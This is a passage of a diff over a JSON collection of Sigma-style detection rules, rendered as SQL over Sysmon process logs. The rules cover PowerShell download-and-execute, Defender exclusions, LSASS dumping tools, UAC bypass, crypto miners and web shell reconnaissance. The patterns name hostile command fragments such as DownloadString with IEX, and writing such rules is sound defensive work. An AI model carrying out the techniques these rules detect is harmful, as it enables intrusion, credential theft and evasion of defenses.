7-ZIP", + "id": "9fbf5927-5261-4284-a71d-f681029ea574", + "status": "test", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Legitimate activity is expected since compressing files with a password is common." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_7zip_password_compression.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "title": "Potential Product Reconnaissance Via Wmic.EXE", + "id": "15434e33-5027-4914-88d5-3d4145ec25a9", "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Scripts or tools that download files and execute them" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_wmic_recon_product.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", + "title": "Gpresult Display Group Policy Information", + "id": "e56d3073-83ff-4021-90fe-c658e0709e72", + "status": "experimental", + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "Legitimate admin usage" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_gpresult_execution.yml" }, { - "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", - "id": "48917adc-a28e-4f5d-b729-11e75da8941f", - "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", - "author": "frack113", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "status": "stable", + "description": "Detects command line parameters or strings often used by crypto miners", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_defender_exclusion.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "status": "test", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_script_execution.yml" }, { - "title": "Custom Class Execution via Xwizard", - "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "title": "Tap Installer Execution", + "id": "99793437-3e16-439b-be0f-078782cf953d", "status": "test", - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate OpenVPN TAP insntallation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" + "filename": "proc_creation_win_tapinstall_execution.yml" }, { - "title": "Gzip Archive Decode Via PowerShell", - "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "title": "Renamed Remote Utilities RAT (RURAT) Execution", + "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "status": "experimental", - "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", - "author": "Hieu Tran", + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" + ], "falsepositives": [ - "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Remote Utilities' AND NOT ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_decode_gzip.yml" + "filename": "proc_creation_win_renamed_rurat.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", + "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "status": "experimental", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "PowerShell Get-Clipboard Cmdlet Via CLI", + "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_powershell_get_clipboard.yml" }, { - "title": "LOLBIN Execution Of The FTP.EXE Binary", - "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "status": "test", - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1053.002" ], "falsepositives": [ - "Unknown" + "Unlikely (at.exe deprecated as of Windows 8)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ftp.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "title": "Potential System Information Discovery Via Wmic.EXE", + "id": "9d5a1274-922a-49d0-87f3-8c653483b909", "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", + "author": "TropChaud", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", - "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 